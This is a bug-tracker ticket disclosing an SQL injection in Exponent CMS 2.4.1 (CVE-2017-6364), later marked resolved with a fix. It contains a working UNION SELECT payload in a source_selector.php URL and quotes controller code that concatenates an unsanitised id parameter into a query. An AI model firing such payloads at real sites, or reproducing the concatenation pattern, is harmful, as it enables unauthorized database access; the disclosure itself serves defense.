SQL Injection Vulnerability in Exponent CMS 2.4.1
Reported by Croxy | February 26th, 2017 @ 03:56 PM | in 2.4.2 (closed)
http://xx.com/source_selector.php?controller=company&action=show
&id=1' UNION ALL SELECT 1,user(),1,1,1,1,1,1,1,1%23
In framework/modules/companyController.php
function show()
{
// global $db, $user, $router;
global $user, $router;
//eDebug($this->params,true);
expHistory::set('viewable', $this->params);
$count_sql_start = 'SELECT COUNT(DISTINCT p.id) as c FROM '.DB_TABLE_PREFIX.'_product p ';
$sql_start = 'SELECT DISTINCT p.* FROM '.DB_TABLE_PREFIX.'_product p ';
//$sql = 'JOIN '.DB_TABLE_PREFIX.'_product_storeCategories sc ON p.id = sc.product_id ';
$sql = 'WHERE ';
if (!$user->isAdmin()) $sql .= '(p.active_type=0 OR p.active_type=1) AND ' ;
//$sql .= 'sc.storecategories_id IN (';
//$sql .= 'SELECT id FROM '.DB_TABLE_PREFIX.'_storeCategories WHERE rgt BETWEEN '.$this->category->lft.' AND '.$this->category->rgt.')';
$sql .= 'p.companies_id=' . $this->params['id'];
$sql .= ' AND p.parent_id = 0';
$count_sql = $count_sql_start . $sql;
$sql = $sql_start . $sql;
//eDebug($sql);
$order = 'id'; //$this->config['orderby'];
$dir = 'DESC'; //$this->config['orderby_dir'];
I can control $this->params['id'],I can use this parameter
for sql injection
IN
Line 118:
assign_to_template(array(
'record'=>new company($this->params['id']),
'page'=>$page,
'defaultSort'=>$defaultSort
));
Comments and changes to this ticket
-
expNinja February 27th, 2017 @ 01:41 PM
- State changed from new to resolved
- Assigned user changed from expNinja to dleffler
- Milestone set to 2.4.2
(from [85c1b9f3e0650e3b970dfd35584c419c06910594]) security fix exploits using source_selector.php reported by Belladona-c0re and croxy [#1407 state:resolved milestone:2.4.2 responsible:dleffler] https://github.com/exponentcms/exponent-cms/commit/85c1b9f3e0650e3b...
-
Croxy March 2nd, 2017 @ 03:30 AM
Hi
I have successfully applied for a CVEID(CVE-2017-6364).
Thank you
Please Sign in or create a free account to add a new ticket.
With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.
Create your profile
Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป
Bug Tracker for Exponent CMS